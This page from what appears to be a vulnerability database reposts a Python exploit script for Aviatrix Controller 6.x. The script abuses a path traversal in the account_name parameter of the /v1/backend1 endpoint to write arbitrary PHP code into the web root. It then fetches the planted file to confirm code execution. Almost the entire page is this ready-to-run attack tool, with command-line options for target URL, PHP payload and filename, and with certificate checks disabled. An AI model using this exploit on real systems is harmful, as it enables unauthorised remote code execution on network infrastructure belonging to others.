Tuesday, October 12, 2021

Aviatrix Controller 6.x Path Traversal / Code Execution

#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""

░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ▄█─ ── ─█▀█─ █▀▀█ ▄▀▀▄ ▄▀▀▄ █▀▀█
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─█─ ▀▀ █▄▄█▄ █▄▀█ ▄▀▀▄ █▄▄─ █▄▀█
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ▄█▄ ── ───█─ █▄▄█ ▀▄▄▀ ▀▄▄▀ █▄▄█
Author : 0xJoyGhosh
Org : System00 Security
Twitter: @0xjoyghosh

""")
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
args = parser.parse_args()
url =f"{args.url}/v1/backend1"
except TypeError:
print("Type -h To See all the options")
except():
exit()
def exploit(url,path,code):
headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
resp = requests.post(url, headers=headers, data=data,verify=False)
stat = requests.get(f"{args.url}/v1/{path}",verify=False)
if resp.status_code==200:
if stat.status_code==200:
print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
print("")
else:
print("[ Exploit successful Creating File Failed ]")
pass
else:
print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')

if args.url is not None:
if args.code is not None:
if args.name is not None:
exploit(url,args.name,args.code)
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore